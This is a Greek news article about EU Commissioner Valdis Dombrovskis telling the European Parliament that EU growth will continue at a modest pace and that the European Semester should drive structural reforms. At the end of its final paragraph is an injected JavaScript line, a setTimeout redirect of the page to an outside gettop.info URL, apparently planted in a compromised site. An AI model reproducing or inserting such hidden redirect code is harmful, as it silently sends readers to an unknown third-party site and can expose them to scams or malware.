Ντομπρόβσκις: Η ανάπτυξη θα συνεχιστεί στην ΕΕ, αλλά με μέτριους ρυθμούς

0
3

 

Για το Ευρωπαϊκό Εξάμηνο και τις προσπάθειες που θα πρέπει να γίνουν ώστε να εξασφαλισθεί η ανάπτυξη για το 2017 μίλησε στην Ολομέλεια του Ευρωκοινοβουλίου ο Βάλντις Ντόμπροβσκις, Επίτροπος για τη Χρηματοπιστωτική Σταθερότητα.

Σύμφωνα με τον Επίτροπο, το Ευρωπαϊκό Εξάμηνο αποτελεί πλέον έναν βασικό μηχανισμό συντονισμού των οικονομικών πολιτικών σε επίπεδο ΕΕ. Έχει διαδραματίσει κρίσιμο ρόλο στην πυροδότηση και στη στήριξη των επειγουσών μεταρρυθμίσεων στα κράτη-μέλη.

Στόχος μας είναι να αντιμετωπίσουμε τις προκλήσεις που παραμένουν και να επιτείνουμε τις προσπάθειες της ΕΕ, σημείωσε ο κ. Ντομπρόβσκις ο οποίος υπογράμμισε ότι πρέπει να καταβληθούν ιδιαίτερες προσπάθειες για διαρθρωτικές μεταρρυθμίσεις σε συμμόρφωση προς τις συγκεκριμένες συστάσεις ανά χώρα ώστε να προωθηθεί η ανάπτυξη και η κοινωνική και η εδαφική συνοχή.

Ο κ. Ντόμπροβσκις αναφέρθηκε στις προβλέψεις της Επιτροπής σύμφωνα με τις οποίες αναμένεται να συνεχισθεί η ανάπτυξη στην ΕΕ με μέτριους όμως ρυθμούς. Υπήρξε επίσης κάποια αύξηση της ιδιωτικής κατανάλωσης, παραμονεύουν όμως πάντα διάφοροι κίνδυνοι για την ανάπτυξη, όπως ο παράγοντας της χαμηλής τιμής του πετρελαίου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here